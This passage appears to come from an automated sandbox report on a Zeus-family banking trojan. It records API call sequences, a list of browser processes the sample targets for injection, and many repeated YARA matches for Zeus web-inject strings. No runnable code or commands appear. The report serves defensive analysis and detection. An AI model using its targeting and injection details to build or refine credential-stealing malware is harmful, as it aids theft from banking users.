      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe8_2_012F67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe8_2_012F67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe8_2_012F67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_012F67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_012F67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012E37E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012E37E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012E37E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe8_2_012F1660
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D29360 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,1_2_02D29360
      Source: WerFault.exeProcess created: 42

      System Summary

      barindex
      Source: 1.3.svchost.exe.39e0000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.2.Bonelessness.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2606000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.a00000.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.2.Bonelessness.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.3.Bonelessness.exe.86d460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2601000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2606c00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2570000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.3.Bonelessness.exe.868460.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.2d83c00.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.24c2000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.2d83c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3a80000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.3.Bonelessness.exe.86d460.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.2.Bonelessness.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.3.Bonelessness.exe.86e060.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.2.Bonelessness.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
